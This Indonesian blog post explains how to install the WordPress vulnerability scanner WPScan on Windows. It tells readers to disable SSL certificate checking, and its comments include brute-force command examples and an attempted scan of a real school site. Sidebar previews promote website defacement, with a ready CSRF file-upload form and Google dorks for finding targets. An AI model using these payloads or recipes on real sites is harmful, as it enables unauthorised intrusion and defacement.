Skip to main content

Cara Install WPScan di Windows

Image
By
squadcyber.org - WPScan adalah tool untuk menguji kerentanan sebuah website yang menggunakan CMS Wordpress, tapi keterangan yang ditulis di wpscan.org menerangkan bahwa WPScan hanya bisa di jalankan pada platform Linux dan tidak mendukung sitem operasi Windows.

Namun kini WPScan tidak hanya bisa berjalan pada Os Linux, Pengguna Windows pun bisa menggunakannya juga, bagaimana cara nya? simak tutorial berikut.


Download Bahan - Bahan nya

  1. Download  Ruby 2.3.3   |  alternative link
  2. Download  DevKit 4.52   |  alternative link
  3. Download  Libcurl.dll   |  alternative link
  4. Download  WPScan 2.9.2   |  alternative link

Cara Install WPScan di Windows

Install Ruby

Buka ruby installer tadi yang sudah di download, pilih bahasa nya dan pilih accept the license, lalu klik next

Pilih dimana kalian akan install ruby nya, dan centang semua nya lalu klik install

Biarkan proses installasi nya berjalan, setelah selesai lalu klik finish

Install DevKit

Ekstrak terlebih dahulu file DevKit nya di drive C:/
lalu buka cmd dan ketikkan cd /

lanjut installasi DevKit nya dengan mengetik
ruby dk.rb init lalu tekan Enter
ruby dk.rb install lalu tekan Enter

Install Curl

Copy file libcurl.dll yang tadi sudah di download ke C:/Ruby32/bin/

Install WPScan

Ekstrak wpscanteam-wpscan-2.9.2-48-g6ccfe70_2.zip yang telah di download sebelumnya ke folder  c:\WPScan.

Sebelum kita bisa menjalankan WPScan, maka beberapa komponen Ruby Gem ini harus di instal terlebih dahulu.

Install Ruby Gems

Dari command prompt, masuk ke c:\WPScan, lalu instal beberapa Gem berikut ini. Lakukan satu persatu, hingga terinstal semuanya.

gem install bundler
gem install typhoeus
gem install rspec-its
gem install ruby-progressbar
gem install nokogiri
gem install terminal-table
gem install webmock
gem install simplecov
gem install rspec
gem install xml-simple
gem install yajl-ruby
gem install bundler && bundle install --without test




Setelah semua nya terinstall, maka kita tinggal menjalankannya 

Cara Menjalankan WPScan di Windows

 Cara menjalankan nya cukup mudah, yaitu tinggal ketik ruby wpscan.rb

Saat pertama kali menjalankan perintah ini, kita akan diminta mengupdate database. Tulis Y lalu tekan Enter untuk meng-update

Jika pada saat update mengalami kendala pada SSL, seperti misalnya
Unable to get https://data.wpscan.org/local_vulnerable_files.xml.sha512 (Peer certificate cannot be authenticated with given CA certificates)

Maka lakukan perubahan pada file db_updater.rb yang berada di c:\wpscan\lib\common\. Ubah ssl_verifypeer: true menjadi ssl_verifypeer: false.
Jika terlihat hasil seperti gambar di bawah ini, berarti WPScan telah terinstal dengan sempurna dan bekerja dengan baik.
Dan kita bisa langsung menjalankannya di windows kita.







Labels:

Comments

  1. Unknown28 November 2017 at 15:40

    boleh MINTA kontaknya gk min ? Line/FB/ .. mau nanya serius

    ReplyDelete
  2. Unknown19 March 2018 at 18:56

    Gan minta kontaknya gan

    ReplyDelete
  3. Wajib bersyukurrr12 April 2018 at 18:02

    gan kok waktu saya masukin perntah bundle install kok gak terinstall malah ada tulisan Could not locate Gemfile tolong jawab

    ReplyDelete
    Replies
    1. V3rluchie12 April 2018 at 23:13

      pastikan jalanin install bundle nya di folder wpscan nya

      Delete
  4. Unknown24 April 2018 at 15:24

    assalamuaikum gan
    kenapa punya sya jadi begini?


    C:\wpscan>ruby wpscan.rb
    [ERROR] Could not open library 'libcurl': The specified module could not be foun
    d.
    .
    Could not open library 'libcurl.dll': The specified module could not be found.
    .
    Could not open library 'libcurl.so.4': The specified module could not be found.
    .
    Could not open library 'libcurl.so.4.dll': The specified module could not be found.

    ReplyDelete
    Replies
    1. V3rluchie24 April 2018 at 23:00

      install libcurl nya gan...di atas udah ada link nya

      Delete
    2. Unknown25 April 2018 at 03:59

      sudah saya install. Trus sudah di copy juga di file ruby23 di file bin
      saya sudah ikuti semua stepnya tapi masih jadi begitu.
      Mohon bantuannya gan...
      makasih

      Delete
    3. Unknown25 April 2018 at 14:49

      MOHON di jawab gan...

      Delete
  5. Mumu Sr17 May 2018 at 10:17

    Ridwan Walangadi.. kasusnya sama seperti sama... tidak bisa
    Admin.. mohon solusinya :)

    ReplyDelete
  6. Unknown1 July 2018 at 19:23

    kok gini sihh
    Examples :

    -Further help ...
    ruby wpscan.rb --help

    -Do 'non-intrusive' checks ...
    ruby wpscan.rb --url www.example.com

    -Do wordlist password brute force on enumerated users using 50 threads ...
    ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

    -Do wordlist password brute force on the 'admin' username only ...
    ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

    -Enumerate installed plugins ...
    ruby wpscan.rb --url www.example.com --enumerate p

    -Enumerate installed themes ...
    ruby wpscan.rb --url www.example.com --enumerate t

    -Enumerate users (from 1 - 10)...
    ruby wpscan.rb --url www.example.com --enumerate u

    -Enumerate users (from 1 - 20)...
    ruby wpscan.rb --url www.example.com --enumerate u[1-20]

    -Enumerate installed timthumbs ...
    ruby wpscan.rb --url www.example.com --enumerate tt

    -Use a HTTP proxy ...
    ruby wpscan.rb --url www.example.com --proxy 127.0.0.1:8118

    -Use a SOCKS5 proxy ... (cURL >= v7.21.7 needed)
    ruby wpscan.rb --url www.example.com --proxy socks5://127.0.0.1:9000

    -Use custom content directory ...
    ruby wpscan.rb -u www.example.com --wp-content-dir custom-content

    -Use custom plugins directory ...
    ruby wpscan.rb -u www.example.com --wp-plugins-dir wp-content/custom-plugins

    -Update the Database ...
    ruby wpscan.rb --update

    -Debug output ...
    ruby wpscan.rb --url www.example.com --debug-output 2>debug.log

    See README for further information.


    [!] No argument supplied

    ReplyDelete
  7. Unknown7 August 2018 at 00:23

    ERROR: Could not find a valid gem 'typhoeus' (>= 0), here is why:
    Unable to download data from https://rubygems.org/ - SSL_connect returned=1 errno=0 state=error: certificate verify failed (https://api.rubygems.org/specs.4.8.gz)

    ReplyDelete
  8. mlehoi5 September 2018 at 23:57

    C:\WPScan>ruby wpscan.rb
    ruby: No such file or directory -- wpscan.rb (LoadError)
    gmna ya gam, padahal udah sesuai tutorial?????

    ReplyDelete
  9. Hikmah5 October 2018 at 12:10

    C:\WPScan>ruby wpscan.rb
    ruby: No such file or directory-wpscan.rb(LoadError)

    NIh gmnh Min pencerahan nya

    ReplyDelete
  10. Unknown24 October 2018 at 07:02

    [i] Updating the Database ...
    Scan Aborted: Unable to get https://data.wpscan.org/plugins.json.sha512 (Peer ce
    rtificate cannot be authenticated with given CA certificates)

    plis bantu om ...

    ReplyDelete
  11. Unknown27 November 2018 at 04:22

    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation. All rights reserved.

    C:\Users\Intel>cd/

    C:\>cd wpscan

    C:\wpscan>wpscan --url http://smkn5-sby.sch.id/
    'wpscan' is not recognized as an internal or external command,
    operable program or batch file.

    kenapa kok gitu gan?? pliss jawab :)

    ReplyDelete
  12. Madrasah Al-Ittihad 2 Pasir Lor19 December 2018 at 04:17

    gan ini gimana ruby: No such file or directory -- wpscan.rb (LoadError) mohon dengan sangat jawabannya

    ReplyDelete
  13. Madrasah Al-Ittihad 2 Pasir Lor19 December 2018 at 04:18

    apa ada pengaruhnya sama ini gan C:\WPScan>gem install bundler && bundle install --without test
    Successfully installed bundler-1.17.2
    Parsing documentation for bundler-1.17.2
    Done installing documentation for bundler after 8 seconds
    1 gem installed
    Could not locate Gemfile

    ReplyDelete
  14. Madrasah Al-Ittihad 2 Pasir Lor19 December 2018 at 04:18

    tolong banget gan dijawab pliisss

    ReplyDelete
  15. angel4 March 2019 at 01:27

    kok pas di langkah yang masukkan perintah "ruby dk.rb install" tulisannya invalid configuration or no rubies listed. please fix'config.yml' and return 'ruby dk.rb install'

    ReplyDelete
  16. Unknown23 March 2019 at 06:39

    gan kok pas langkah terakhir yang "gem install bundler && bundle install --without test" itu error yah? tolong banget gan. soalnya bener" lagi cari ilmu. terima kasih sebelunya

    ReplyDelete
  17. Unknown23 March 2019 at 06:41

    semuanya lancar cuma step terakhir yag error gan. tolong banget gan :(

    ReplyDelete

Post a Comment

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

By
squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...
5 comments
Read more

Deface Wordpress Bruteforce dengan WPScan

By
squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...
Post a Comment
Read more

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

By
www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...
Post a Comment
Read more